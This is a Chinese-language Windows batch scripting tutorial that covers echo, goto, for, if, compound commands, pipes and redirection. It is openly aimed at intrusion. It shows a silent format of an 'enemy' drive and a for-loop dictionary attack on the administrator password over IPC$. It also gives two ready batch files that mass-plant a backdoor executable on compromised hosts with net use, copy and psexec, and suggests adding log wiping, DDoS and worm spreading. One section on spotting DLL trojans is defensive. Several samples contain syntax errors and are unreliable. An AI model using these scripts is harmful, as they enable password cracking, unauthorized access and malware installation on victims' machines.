windows bat腳本編寫

一.簡單批處理內部命令簡介 

1.Echo 命令 

打開回顯或關閉請求回顯功能，或顯示消息。如果沒有任何參數，echo 命令將顯示當前回顯設置。 

語法: 

echo [{on│off}] [message] 
Sample：@echo off / echo hello world 

在實際應用中我們會把這條命令和重定向符號（也稱爲管道符號，一般用> >> ^）結合來實現輸入一些命 

令到特定格式的文件中.這將在以後的例子中體現出來。 

2.@ 命令 

表示不顯示@後面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬盤）自然不能讓對方看到你使 

用的命令啦。 

Sample：@echo off 
@echo Now initializing the program,please wait a minite... 
@format X: /q/u/autoset (format 這個命令是不可以使用/y這個參數的，可喜的是微軟留了個autoset這 

個參數給我們，效果和/y是一樣的。) 

3.Goto 命令 

指定跳轉到標籤，找到標籤後，程序將處理從下一行開始的命令。 

語法：goto label （label是參數，指定所要轉向的批處理程序中的行。） 
Sample： 
if {%1}=={} goto noparms 
if {%2}=={} goto noparms（如果這裏的if、%1、%2你不明白的話，先跳過去，後面會有詳細的解釋。） 
@Rem check parameters if null show usage 
:noparms 
echo Usage: monitor.bat ServerIP PortNumber 
goto end 

標籤的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標籤，goto命令 

就是根據這個：來尋找下一步跳到到那裏。最好有一些說明這樣你別人看起來纔會理解你的意圖啊。 

4.Rem 命令 

註釋命令，在C語言中相當與/*--------*/,它並不會被執行，只是起一個註釋的作用，便於別人閱讀和你 

自己日後修改。 

Rem Message 
Sample：@Rem Here is the description. 

5.Pause 命令 

運行 Pause 命令時，將顯示下面的消息： 
Press any key to continue . . . 

Sample： 
@echo off 
:begin 
copy a:*.* d：\back 
echo Please put a new disk into driver A 
pause 
goto begin 

在這個例子中，驅動器 A 中磁盤上的所有文件均複製到d:\back中。顯示的註釋提示您將另一張磁盤放入 

驅動器 A 時，pause 命令會使程序掛起，以便您更換磁盤，然後按任意鍵繼續處理。 

6.Call 命令 

從一個批處理程序調用另一個批處理程序，並且不終止父批處理程序。call 命令接受用作調用目標的標籤 

。如果在腳本或批處理文件外使用 Call，它將不會在命令行起作用。 

語法: 
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 

參數: 
[Drive:}[Path] FileName 

指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。 

7.start 命令 

調用外部程序，所有的DOS命令和命令行程序都可以由start命令來調用。 
常用參數： 
MIN 開始時窗口最小化 
SEPARATE 在分開的空間內開始 16 位 Windows 程序 
HIGH 在 HIGH 優先級類別開始應用程序 
REALTIME 在 REALTIME 優先級類別開始應用程序 
WAIT 啓動應用程序並等候它結束 
parameters 這些爲傳送到命令/程序的參數 

執行的應用程序是 32-位 GUI 應用程序時，CMD.EXE不等應用程序終止就返回命令提示。如果在命令腳本 

內執行，該新行爲則不會發生。 

8.choice 命令 

choice 使用此命令可以讓用戶輸入一個字符，從而運行不同的命令。使用時應該加/c:參數，c:後應寫提 

示可輸入的字符，之間無空格。它的返回碼爲1234...... 

如: choice /c:dme defrag,mem,end 

將顯示 
defrag,mem,end[D,M,E]? 

Sample： 
Sample.bat的內容如下: 

@echo off 
choice /c:dme defrag,mem,end 
if errorlevel 3 goto defrag （應先判斷數值最高的錯誤碼） 
if errorlevel 2 goto mem 
if errotlevel 1 goto end 

:defrag 
c:\dos\defrag 
goto end 
:mem 
mem 
goto end 
:end 
echo good bye 

此文件運行後，將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ，然後if語句將作出判斷，d表示執行 

標號爲defrag的程序段，m表示執行標號爲mem的程序段，e表示執行標號爲end的程序段，每個程序段最後 

都以goto end將程序跳到end標號處，然後程序將顯示good bye，文件結束。 

9.If 命令 

if 表示將判斷是否符合規定的條件，從而決定執行不同的命令。 

有三種格式: 

1)、if "參數" == "字符串" 待執行的命令 
參數如果等於指定的字符串，則條件成立，運行命令，否則運行下一句。(注意是兩個等號） 

如if "%1"=="a" format a: 
if {%1}=={} goto noparms 
if {%2}=={} goto noparms 

2)、if exist 文件名 待執行的命令 
如果有指定的文件，則條件成立，運行命令，否則運行下一句。 

如if exist config.sys edit config.sys 

3)、if errorlevel / if not errorlevel 數字 待執行的命令 
如果返回碼等於指定的數字，則條件成立，運行命令，否則運行下一句。 

如if errorlevel 2 goto x2 

DOS程序運行時都會返回一個數字給DOS，稱爲錯誤碼errorlevel或稱返回碼，常見的返回碼爲0、1。 

10.for 命令 

for 命令是一個比較複雜的命令，主要用於參數在指定的範圍內循環執行命令。 
在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable 

for {%variable│%%variable} in (set) do command [ CommandLineOptions] 
%variable 指定一個單一字母可替換的參數。 
(set) 指定一個或一組文件。可以使用通配符。 
command 指定對每個文件執行的命令。 
command-parameters 爲特定命令指定參數或命令行開關。 

在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable 
而不要用 %variable。變量名稱是區分大小寫的，所以 %i 不同於 %I 

如果命令擴展名被啓用，下列額外的 FOR 命令格式會受到支持: 
FOR /D %variable IN (set) DO command [command-parameters] 

如果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。 

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters] 

檢查以 [drive:]path 爲根的目錄樹，指向每個目錄中的FOR 語句。如果在 /R 後沒有指定目錄，則使用 

當前目錄。如果集僅爲一個單點(.)字符，則枚舉該目錄樹。 

FOR /L %variable IN (start,step,end) DO command [command-parameters] 

該集表示以增量形式從開始到結束的一個數字序列。 
因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生 
序列 (5 4 3 2 1)。 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN ('command') DO command 

或者，如果有 usebackq 選項: 

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN ('command') DO command 

filenameset 爲一個或多個文件名。繼續到 filenameset 中的下一個文件之前，每份文件都已被打開、讀 

取並經過處理。 
處理包括讀取文件，將其分成一行行的文字，然後將每行解析成零或更多的符號。然後用已找到的符號字 

符串變量值調用 For 循環。以默認方式，/F 通過每個文件的每一行中分開的第一個空白符號。跳過空白 

行。您可通過指定可選 "options" 參數替代默認解析操作。這個帶引號的字符串包括一個或多個指定不同 

解析選項的關鍵字。這些關鍵字爲: 

eol=c - 指一個行註釋字符的結尾(就一個) 
skip=n - 指在文件開始時忽略的行數。 
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。 
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變量名稱的 
格式爲一個範圍。通過 nth 符號指定 m 符號字符串中的最後一個字符星號，那麼額外的變量將在最後一 

個符號解析之分配並接受行的保留文本。 
usebackq - 指定新語法已在下類情況中使用: 
在作爲命令執行一個後引號的字符串並且引號字符爲文字字符串命令並允許在 file-set中使用雙引號擴起 

文件名稱。 

sample1: 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 

會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 

程序體；用逗號和/或 空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 

%j 來取得第三個符號，引用 %k來取得第三個符號後的所有剩餘符號。對於帶有空格的文件名，您需要用 

雙引號將文件名括起來。爲了用這種方式來使用雙引號，您還需要使用 usebackq 選項，否則，雙引號會 

被理解成是用作定義某個要分析的字符串的。 

%i 專門在 for 語句中得到說明，%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 

一行指定最多 26 個符號，只要不試圖說明一個高於字母 'z' 或'Z' 的變量。請記住，FOR 變量是單一字 

母、分大小寫和全局的；同時不能有 52 個以上都在使用中。 

您還可以在相鄰字符串上使用 FOR /F 分析邏輯；方法是，用單引號將括號之間的 filenameset 括起來。 

這樣，該字符串會被當作一個文件中的一個單一輸入行。 

最後，您可以用 FOR /F 命令來分析命令的輸出。方法是，將括號之間的 filenameset 變成一個反括字符 

串。該字符串會被當作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進內存，並被當作文件分析。因此 

，以下例子: 

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

會枚舉當前環境中的環境變量名稱。 

另外，FOR 變量參照的替換已被增強。您現在可以使用下列選項語法: 

~I - 刪除任何引號(")，擴充 %I 
%~fI - 將 %I 擴充到一個完全合格的路徑名 
%~dI - 僅將 %I 擴充到一個驅動器號 
%~pI - 僅將 %I 擴充到一個路徑 
%~nI - 僅將 %I 擴充到一個文件名 
%~xI - 僅將 %I 擴充到一個文件擴展名 
%~sI - 擴充的路徑只含有短名 
%~aI - 將 %I 擴充到文件的文件屬性 
%~tI - 將 %I 擴充到文件的日期/時間 
%~zI - 將 %I 擴充到文件的大小 
%~$PATH:I - 查找列在路徑環境變量的目錄，並將 %I 擴充到找到的第一個完全合格的名稱。如果環境變 

量未被定義，或者沒有找到文件，此組合鍵會擴充空字符串 

可以組合修飾符來得到多重結果: 

%~dpI - 僅將 %I 擴充到一個驅動器號和路徑 
%~nxI - 僅將 %I 擴充到一個文件名和擴展名 
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名 
%~dp$PATH:i - 查找列在路徑環境變量的目錄，並將 %I 擴充到找到的第一個驅動器號和路徑。 
%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR 

在以上例子中，%I 和 PATH 可用其他有效數值代替。%~ 語法用一個有效的 FOR 變量名終止。選取類似 

%I 的大寫變量名比較易讀，而且避免與不分大小寫的組合鍵混淆。 

以上是MS的官方幫助，下面我們舉幾個例子來具體說明一下For命令在入侵中的用途。 

sample2： 

利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。 

我們用net use file://ip/ipc$ "password" /u:"administrator"來嘗試這和目標主機進行連接，當成功時記下 

密碼。 
最主要的命令是一條：for /f i% in (dict.txt) do net use file://ip/ipc$ "i%" /u:"administrator" 
用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use 命令來連接。然後將程序運行結果傳遞給 

find命令－－ 
for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator"│find ":命令成功完 

成">>D:\ok.txt ，這樣就ko了。 

sample3： 

你有沒有過手裏有大量肉雞等着你去種後門＋木馬呢？，當數量特別多的時候，原本很開心的一件事都會 

變得很鬱悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重複性任務。那麼如何實現呢？呵呵 

，看下去你就會明白了。 

主要命令也只有一條：（在批處理文件中使用 FOR 命令時，指定變量使用 %%variable） 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k 
tokens的用法請參見上面的sample1，在這裏它表示按順序將victim.txt中的內容傳遞給door.bat中的參數 

%i %j %k。 
而cultivate.bat無非就是用net use命令來建立IPC$連接，並copy木馬＋後門到victim，然後用返回碼 

（If errorlever =）來篩選成功種植後門的主機，並echo出來，或者echo到指定的文件。 
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裏你也一定明白這victim.txt裏的內容 

是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列，一般就是 ip password username。 

代碼雛形： 
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------- 

------ 
@echo off 
@if "%1"=="" goto usage 
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k 
@goto end 
:usage 
@echo run this batch in dos modle.or just double-click it. 
:end 
--------------- cut here then save as a batchfile(I call it main.bat ) --------------------- 

------ 

------------------- cut here then save as a batchfile(I call it door.bat) ------------------ 

----------- 
@net use file://%1/ipc$ %3 /u:"%2" 
@if errorlevel 1 goto failed 
@echo Trying to establish the IPC$ connection ............OK 
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 

>>ko.txt 
@psexec file://%1/ c:\winnt\system32\windrv32.exe 
@psexec file://%1/ net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed 
@echo Sorry can not connected to the victim. 
----------------- cut here then save as a batchfile(I call it door.bat) -------------------- 

------------ 

這只是一個自動種植後門批處理的雛形，兩個批處理和後門程序（Windrv32.exe）,PSexec.exe需放在統一 

目錄下.批處理內容 
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深入一點可以使之具備自動傳播功 

能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究. 

二.如何在批處理文件中使用參數 

批處理中可以使用參數，一般從1%到 9%這九個，當有多個參數時需要用shift來移動，這種情況並不多見 

，我們就不考慮它了。 

sample1：fomat.bat 

@echo off 
if "%1"=="a" format a: 
:format 
@format a:/q/u/auotset 
@echo please insert another disk to driver A. 
@pause 
@goto fomat 
這個例子用於連續地格式化幾張軟盤，所以用的時候需在dos窗口輸入fomat.bat a，呵呵,好像有點畫蛇添 

足了～ 

sample2： 

當我們要建立一個IPC$連接地時候總要輸入一大串命令，弄不好就打錯了，所以我們不如把一些固定命令 

寫入一個批處理，把肉雞地ip password username 當着參數來賦給這個批處理，這樣就不用每次都打命令 

了。 
@echo off 
@net use file://1%/ipc$ "2%" /u:"3%" 注意哦，這裏PASSWORD是第二個參數。 
@if errorlevel 1 echo connection failed 
怎麼樣,使用參數還是比較簡單的吧？你這麼帥一定學會了.No.3 

三.如何使用組合命令(Compound Command) 

1.& 

Usage：第一條命令 & 第二條命令 [& 第三條命令...] 

用這種方法可以同時執行多條命令，而不管命令是否執行成功 

Sample： 
C:\>dir z: & dir c:\Ex4rch 
The system cannot find the path specified. 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:51 . 
2002-05-14 23:51 .. 
2002-05-14 23:51 14 sometips.gif 

2.&& 
Usage：第一條命令 && 第二條命令 [&& 第三條命令...] 

用這種方法可以同時執行多條命令，當碰到執行出錯的命令後將不執行後面的命令，如果一直沒有出錯則 

一直執行完所有命令； 

Sample： 
C:\>dir z: && dir c:\Ex4rch 
The system cannot find the path specified. 

C:\>dir c:\Ex4rch && dir z: 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:55 . 
2002-05-14 23:55 .. 
2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
2 Dir(s) 768,671,744 bytes free 
The system cannot find the path specified. 

在做備份的時候可能會用到這種命令會比較簡單，如： 
dir file&://192.168.0.1/database/backup.mdb && copy file&://192.168.0.1/database/backup.mdb 

E:\backup 
如果遠程服務器上存在backup.mdb文件，就執行copy命令，若不存在該文件則不執行copy命令。這種用法 

可以替換IF exist了. 

3.││ 

Usage：第一條命令 ││ 第二條命令 [││ 第三條命令...] 

用這種方法可以同時執行多條命令，當碰到執行正確的命令後將不執行後面的命令，如果沒有出現正確的 

命令則一直執行完所有命令； 

Sample： 
C:\Ex4rch>dir sometips.gif ││ del sometips.gif 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of C:\Ex4rch 

2002-05-14 23:55 14 sometips.gif 
1 File(s) 14 bytes 
0 Dir(s) 768,696,320 bytes free 

組合命令使用的例子： 

sample： 
@copy trojan.exe file://%1/admin$/system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 

>>victim.txt 

四、管道命令的使用 

1.│ 命令 
Usage：第一條命令 │ 第二條命令 [│ 第三條命令...] 
將第一條命令的結果作爲第二條命令的參數來使用，記得在unix中這種方式很常見。 

sample： 
time /t>>D:\IP.log 
netstat -n -p tcp│find ":3389">>D:\IP.log 
start Explorer 

看出來了麼？用於終端服務允許我們爲用戶自定義起始的程序，來實現讓用戶運行下面這個bat，以獲得登 

錄用戶的IP。 

2.>、>>輸出重定向命令 
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在於，>會清除調原有文件中的內 

容後寫入指定文件，而>>只會追加內容到指定文件中，而不會改動其中的內容。 

sample1： 
echo hello world>c:\hello.txt (stupid example?) 

sample2: 
時下DLL木馬盛行，我們知道system32是個捉迷藏的好地方，許多木馬都削尖了腦袋往那裏鑽，DLL馬也不 

例外，針對這一點我們可以在安裝好系統和必要的應用程序後，對該目錄下的EXE和DLL文件作一個記錄： 
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 
這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中, 
日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了. 
這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然後運 

行: 
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比 

較前後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE文件, 

然後通過查看創建時間、版本、是否經過壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒 

有是最好，如果有的話也不要直接DEL掉，先用regsvr32 /u trojan.dll將後門DLL文件註銷掉,再把它移到 

回收站裏，若系統沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。 

3.< 、>& 、<& 
< 從文件中而不是從鍵盤中讀入命令輸入。 
>& 將一個句柄的輸出寫入到另一個句柄的輸入中。 
<& 從一個句柄讀取輸入並將其寫入到另一個句柄輸出中。 
這些並不常用，也就不多做介紹。